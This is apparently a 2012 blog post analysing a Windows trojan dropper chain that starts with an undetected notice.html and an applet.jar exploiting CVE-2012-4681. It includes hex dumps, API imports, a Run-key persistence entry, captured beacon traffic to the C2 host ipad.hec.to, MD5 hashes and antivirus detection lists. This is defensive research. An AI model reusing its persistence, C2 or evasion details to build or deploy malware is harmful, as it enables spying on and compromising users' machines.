Plain PE Binary: 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 A5 0E 26 78 E1 6F 48 2B E1 6F 48 2B E1 6F 48 2B ..&x.oH+.oH+.oH+ PE Sections: .text 0x1000 0x440a 20480 .rdata 0x6000 0xc4a 4096 .data 0x7000 0x317c 12288 .rsrc 0xb000 0x18418 102400 Build Trace Result: Packed by: Armadillo v1.71Armadillo v1.71 - additional Compiled by: Microsoft Visual C++ v6.0/5.0 Setup Made by: Installer VISE CustomInstaller VISE Custom Some Details: Entry Point: 0x16fe Compile time: 0x503B61D5 [Mon Aug 27 12:02:29 2012 UTC] Fake Attribs: LangID: 040904b0 LegalCopyright: Copyright (C) Nesoft Corp. InternalName: FileVersion: 5, 1, 2600, 2181 CompanyName: Copyright (C) Nesoft Corp. PrivateBuild: LegalTrademarks: Comments: ProductName: SpecialBuild: ProductVersion: 5, 1, 2600, 2181 FileDescription: Internet Extensions for Win32 //Some malicious calls detected in reversing.. 0x406018 KERNEL32.dll.CreateFileA //Malicious 0x4060ac KERNEL32.dll.WriteFile //Malicious 0x406027 KERNEL32.dll.CreateThread //Malicious 0x40604d KERNEL32.dll.WinExec //Malicious 0x406022 KERNEL32.dll.GetCommandLineA //Malicious 0x4060bc HeapCreate //DEP Violation 0x4060c8 VirtualAlloc //DEP Violation 0x40609c TlsSetValue //TLS aware calls 0x4060a0 TlsAlloc //TLS aware calls 0x4060a8 TlsGetValue //TLS aware calls //+Registry op's: ADVAPI32.dll.RegCreateKeyA Hint[350] ADVAPI32.dll.RegSetValueExA Hint[390] ADVAPI32.dll.RegCloseKey Hint[347] ADVAPI32.dll.RegOpenKeyExA Hint[370] //PS: List of complete call --->>[CLICK HERE]
Up to this point of view I can see a pattern of trojan dropper, the packed area shows some list of names suggesting urls like: "hec. to " & "http://%s" so on, but some packed area confusing a bit need my full reversing effort to crack it well.. According to the complete calls there are a lot of information - achived by those calls there which showing a possibility of spyware. There must be internet traffic made since the TLS and socket operations are detected. Since I was not in the mood to reverse this mess further - considering the date of this payload is already a 12days old, so I know that someone must have been analyzed this well, then let's no need to waste our time further & make it faster, so just run it & check the forensics result of it ...and got these details:
Dropped: FileName: mdm.exe C:\Documents and Settings\Administrator\Application Data\Microsoft\mdm.exe MD5: 199c1c10088820aff239321bf5f6c87c Size: 98304 Bytes Pic: Hex Snip: 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 CC D5 3F 6A 88 B4 51 39 88 B4 51 39 88 B4 51 39 ..?j..Q9..Q9..Q9 Executed API: Shell=C:\Documents and Settings\Administrator\Application Data\Microsoft\mdm.exe AutoRun in Registry: HKU\​S-1-5-21-842925246-1425521274-308236825-500\​Software\​Microsoft\​ Windows\​CurrentVersion\​Run wim = C:\​Documents and Settings\​Administrator\​Application Data\​Microsoft\​mdm.exe Malicious Process (daemonized) PID/ProcessName: 3844 mdm Base: C:\Documents and Settings\Administrator\Application Data\Microsoft\mdm.exe
Very good, we know exactly what mess that we're dealing with now, it is a trojan malware for sure. let's see the network traffic made by it (I am a huge fan of tcpdump!). While running the dropped sample we got the DNS Request of ipad.hec.to host:
Req: 00000000 9a 5c 01 00 00 01 00 00 00 00 00 00 04 69 70 61 .\...... .....ipa 00000010 64 03 68 65 63 02 74 6f 00 00 01 00 01 d.hec.to ..... Ans: 00000000 9a 5c 81 80 00 01 00 01 00 04 00 05 04 69 70 61 .\...... .....ipa 00000010 64 03 68 65 63 02 74 6f 00 00 01 00 01 c0 0c 00 d.hec.to ........ 00000020 01 00 01 00 00 0e 10 00 04 0c a3 20 0f c0 11 00 ........ ... .... 00000030 02 00 01 00 00 0e 10 00 10 03 6e 73 34 06 61 66 ........ ..ns4.af 00000040 72 61 69 64 03 6f 72 67 00 c0 11 00 02 00 01 00 raid.org ........ 00000050 00 0e 10 00 06 03 6e 73 31 c0 3d c0 11 00 02 00 ......ns 1.=..... 00000060 01 00 00 0e 10 00 06 03 6e 73 33 c0 3d c0 11 00 ........ ns3.=... 00000070 02 00 01 00 00 0e 10 00 06 03 6e 73 32 c0 3d c0 ........ ..ns2.=. 00000080 55 00 01 00 01 00 00 01 2c 00 04 32 17 c5 5f c0 U....... ,..2.._. 00000090 55 00 1c 00 01 00 00 01 2c 00 10 26 07 f0 d0 11 U....... ,..&.... 000000A0 02 00 d5 00 00 00 00 00 00 00 02 c0 79 00 01 00 ........ ....y... 000000B0 01 00 00 01 2c 00 04 ae 25 c4 37 c0 67 00 01 00 ....,... %.7.g... 000000C0 01 00 00 01 2c 00 04 48 14 0f 3e c0 39 00 01 00 ....,..H ..>.9... 000000D0 01 00 00 01 2c 00 04 ae 80 f6 66 ....,... ..f
Then we saw the HTTP/POST packet sent from our malware:
In Hex: 00000000 50 4f 53 54 20 2f 34 33 30 38 32 38 2e 61 73 70 POST /43 0828.asp 00000010 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a HTTP/1. 1..Host: 00000020 20 69 70 61 64 2e 68 65 63 2e 74 6f 0d 0a 43 6f ipad.he c.to..Co 00000030 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 0d ntent-Le ngth: 1. 00000040 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 43 6f .Accept: */*..Co 00000050 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c ntent-Ty pe: appl 00000060 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 ication/ octet-st 00000070 72 65 61 6d 0d 0a 55 73 65 72 2d 41 67 65 6e 74 ream..Us er-Agent 00000080 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 : Mozill a/4.0 (c 00000090 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 ompatibl e; MSIE 000000A0 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 6.0; Win dows NT 000000B0 35 2e 31 29 0d 0a 0d 0a 5.1).... :(HOST) (IP) Plain Text: POST /430828.asp HTTP/1.1 Host: ipad.hec.to Content-Length: 1 Accept: */* Content-Type: application/octet-stream User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
There goes your Browser/Hostname/IP information... (since my RAT still down & I used my wife's PC to test :-P, can't show more..) .. written in the packet sent via POST command to this mothership. I am sure in there is a server is file "430828.asp" who's receiving our info. Then a HTTP/GET command was sent:
In Hex: 00000000 47 45 54 20 2f 34 33 32 30 31 35 6e 2e 74 78 74 GET /432 015n.txt 00000010 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a HTTP/1. 1..Host: 00000020 20 69 70 61 64 2e 68 65 63 2e 74 6f 0d 0a 43 6f ipad.he c.to..Co 00000030 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d ntent-Le ngth: 0. 00000040 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 43 6f .Accept: */*..Co 00000050 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c ntent-Ty pe: appl 00000060 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 ication/ octet-st 00000070 72 65 61 6d 0d 0a 55 73 65 72 2d 41 67 65 6e 74 ream..Us er-Agent 00000080 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 : Mozill a/4.0 (c 00000090 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 ompatibl e; MSIE 000000A0 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 6.0; Win dows NT 000000B0 35 2e 31 29 0d 0a 0d 0a 5.1).... Plain Text: GET /432015n.txt HTTP/1.1 Host: ipad.hec.to Content-Length: 0 Accept: */* Content-Type: application/octet-stream User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
To make things shorter (again) the pcap file saved will look like this in Wireshark with the timeline sorted: Let's "dig" a little bit further to the mothership network:
Name: ipad.hec.to Address: 12.163.32.15 NS: afraid.org (FreeDNS) NS1.AFRAID.ORG & NS2.AFRAID.ORG Network and Routing via: AS7018 / ATT-INTERNET4 AT&T WorldNet Services
This is at least what I checked so far. So let's compare our investigation result with Virus Total: The svchost.exe:
MD5: 265f46c572f4e5a3b17d39cb74f01e15 File size: 140.0 KB ( 143360 bytes ) File name: scvhost.exe File type: Win32 EXE Tags: peexe armadillo mz Detection: 32 / 42 Analysis date: 2012-09-12 15:13:01 UTC ( 0 分 ago ) URL:------>>[CLICK] Malware Name: nProtect : Trojan-Spy/W32.Agent.143360.X CAT-QuickHeal : TrojanDropper.Malf McAfee : Generic Dropper.p K7AntiVirus : Trojan VirusBuster : Trojan.DR.Agent!VaQDwJLyD+E F-Prot : W32/Dropper.gen8!Maximus Symantec : Trojan.Gen Norman : W32/Troj_Generic.DTHAK ByteHero : Trojan.Malware.Obscu.Gen.006 TrendMicro-HouseCall : TROJ_GEN.R47CDHU Avast : Win32:Spyware-gen [Spy] Kaspersky : Trojan-Spy.Win32.Agent.cdvo BitDefender : Gen:Trojan.Heur.iq0@InUaCZdi Sophos : Sus/Behav-1018 Comodo : UnclassifiedMalware F-Secure : Gen:Trojan.Heur.iq0@InUaCZdi DrWeb : Trojan.DownLoader6.49798 VIPRE : Trojan.Win32.Generic!BT AntiVir : TR/Dropper.Gen TrendMicro : TROJ_GEN.R47CDHU McAfee-GW-Edition : Generic Dropper.p Emsisoft : Trojan-Dropper.Win32.Malf!IK Jiangmin : Trojan/Agent.hfrc Microsoft : TrojanDropper:Win32/Malf.gen ViRobot : Trojan.Win32.A.Agent.143360.FP GData : Gen:Trojan.Heur.iq0@InUaCZdi Commtouch : W32/Dropper.gen8!Maximus ESET-NOD32 : Win32/Spindest.B VBA32 : SScope.Trojan.Vundo.2721 PCTools : Trojan.Gen Ikarus : Trojan-Dropper.Win32.Malf AVG : PSW.Agent.AXPJ.dropper
The mdm.exe:
MD5: 199c1c10088820aff239321bf5f6c87c File size: 96.0 KB ( 98304 bytes ) File name: mdm.exe File type: Win32 EXE Tags: peexe armadillo Detection: 25 / 42 Analysis date: 2012-09-12 15:23:52 UTC ( 0 分 ago ) URL:-------->>[CLICK] MalwareName: CAT-QuickHeal : TrojanSpy.Agent.cdvo McAfee : Generic PWS.o K7AntiVirus : Spyware F-Prot : W32/Heuristic-KPP!Eldorado Symantec : Trojan.Gen Norman : W32/Troj_Generic.DUHUU ESET-NOD32 : Win32/Spindest.B TrendMicro-HouseCall : TROJ_GEN.R11C9I2 Avast : Win32:Spyware-gen [Spy] Kaspersky : Trojan-Spy.Win32.Agent.cdvo BitDefender : Gen:Variant.Graftor.24477 Comodo : UnclassifiedMalware F-Secure : Gen:Variant.Graftor.24477 DrWeb : Trojan.DownLoader6.49798 VIPRE : Trojan.Win32.Generic!BT AntiVir : HEUR/Malware TrendMicro : TROJ_GEN.R11C9I2 McAfee-GW-Edition : Generic PWS.o Emsisoft : Win32.SuspectCrc!IK Jiangmin : TrojanSpy.Agent.xpg ViRobot : Trojan.Win32.A.Agent.98304.AAK GData : Gen:Variant.Graftor.24477 PCTools : Trojan.Gen Ikarus : Win32.SuspectCrc AVG : PSW.Agent.AXPJ
The applet.jar:
MD5: 93775017d90ee6c05a2a69bde6b194df File size: 1.3 KB ( 1309 bytes ) File name: applet.jar File type: JAR Detection: 15 / 42 Analysis date: 2012-09-12 15:28:38 UTC ( 0 分 ago ) URL:-------->>[CLICK] Malware Name: F-Secure : Exploit:Java/CVE-2012-4681.D DrWeb : Java.Downloader.688 Microsoft : Exploit:Java/CVE-2012-4681.FX AntiVir : EXP/CVE-2012-4681 TrendMicro : JAVA_EXPL.SM4 ESET-NOD32 : Java/Exploit.CVE-2012-4681.Q TrendMicro-HouseCall : TROJ_GEN.F47V0830 Avast : Java:CVE-2012-4681-G [Expl] nProtect : Java.Exploit.CVE-2012-4681.D GData : Java.Exploit.CVE-2012-4681.D Kaspersky : HEUR:Exploit.Java.CVE-2012-4681.gen BitDefender : Java.Exploit.CVE-2012-4681.D Emsisoft : Java.Dong!IK Ikarus : Java.Dong Sophos : Exp/20124681-A
Well those malwares can be detected already, BUT!!!! The main infector of this scheme, which is file "notice.html" is not and - I don't think can be detected in the future either:
MD5: 96084d59b5d5ec66a6de11a0502a6f0a File size: 1.2 KB ( 1222 bytes ) File name: notice.html File type: HTML Detection ratio: 0 / 41 <====ZERO DETECTION!! Analysis date: 2012-09-12 15:34:46 UTC ( 0 分 ago ) URL: ------>>[CLICK]
So the detection rates of this infection started from the infector is as below:
notice.html -----> applet.jar ----> scvhost.exe ----> mdm.exe (0/42) (15/42) (25/42) (35/42)
Let's summarize the moral of this story which are:
1. See the dates of the sample findings I detected few hours today who said that CVE-2012-4681 infector attack is over? The code is- a bit improving the way I saw it. 2. Gentlemen, DO NOT leave your web server unset & unattained online. You'll get these mess injected to it.. 3. AntiVirus products is aiming mostly to payload malware than to its infectors, since the base scanning (pattern macthing ) cannot detect all possible scheme of infector files, w/o gaining False Positive.
It's time to think another vector of scanning these infector, smarter one! And this is why I feel those malware retards are laughing at us now...